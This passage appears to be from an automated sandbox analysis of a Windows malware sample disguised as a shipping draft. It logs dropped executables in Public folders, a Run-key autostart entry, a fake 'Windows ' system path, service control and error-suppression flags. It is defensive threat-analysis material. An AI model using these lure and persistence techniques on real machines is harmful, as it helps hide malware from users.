Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\ger.exe	Jump to dropped file

Drops PE files to the windows directory (C:\Windows)

Source: C:\Windows\System32\extrac32.exe

File created: C:\Windows \System32\per.exe

Jump to dropped file

Boot Survival

Drops PE files to the user root directory

Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\alpha.exe	Jump to dropped file
Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\xkn.exe	Jump to dropped file
Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\ger.exe	Jump to dropped file

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

Code function: 0_2_2795AB0D OpenSCManagerW,OpenServiceW,CloseServiceHandle,ControlService,QueryServiceStatus,StartServiceW,

0_2_2795AB0D

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Glzskrlg			Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Glzskrlg			Jump to behavior

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

Code function: 0_2_27975E5E GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_27975E5E

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\glrkszlG.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\glrkszlG.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\glrkszlG.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
